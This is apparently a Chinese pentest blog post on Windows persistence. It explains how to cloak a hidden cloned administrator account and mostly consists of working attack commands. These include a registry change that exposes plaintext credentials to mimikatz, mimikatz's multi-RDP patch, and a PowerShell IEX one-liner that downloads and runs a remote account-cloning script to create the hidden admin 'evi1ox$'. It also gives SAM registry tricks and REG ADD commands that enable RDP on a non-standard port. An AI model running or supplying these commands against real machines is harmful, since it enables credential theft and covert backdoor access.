Powershell-Clone-Account

凡是不能把我毁灭的,都将使我更强

0x00 Server2012抓不到明文

From:Evi1cg + 3gstudent

HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
UseLogonCredential设置为1,DWORD为32,
重启后就可以抓取了

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

ps:该方法在系统重启后失效,下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改

https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1

1
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u evi1ox$ -p Test@123 -cu administrator


0x01 3gstudent的奇淫技巧

删除注册表HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ 下对应帐户的键值(共有两处)

HKEY_LOCAL_MACHINE\SAM\SAM\* [1 17]

注意:
*代表枚举所有子键
1代表Administrators 完全访问
17代表System 完全访问


1、复制管理员帐户Administrator

需要注意管理员帐户是否被禁用,如果被禁用,那么克隆出的隐藏帐户也是被禁用状态

2、复制已有帐户

在3389远程登录的利用上存在相同帐户的冲突关系
通过cmd开启本机的3389远程登录功能:

1
2
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

利用以上方法,克隆帐户a的权限,建立隐藏帐户aaa$
如果系统当前登录帐号为a,那么使用隐藏帐户aaa$登录的话,会系统被识别为帐户a,导致帐户a下线

3、新建帐户再复制

进一步,大胆的思考
新建管理员帐户b,克隆帐户b,建立隐藏账户bbb$
删除管理员帐户b,隐藏账户bbb$仍然有效

4、原帐户的维持

再进一步
克隆帐户a的权限,建立隐藏帐户aaa$
修改帐户a的密码,隐藏帐户aaa$仍然有效


https://xz.aliyun.com/t/1573/
https://evi1cg.me/archives/UserClone.html

本文为原创,转载请遵守本站的版本

更新于: 2018年10月26日 01:10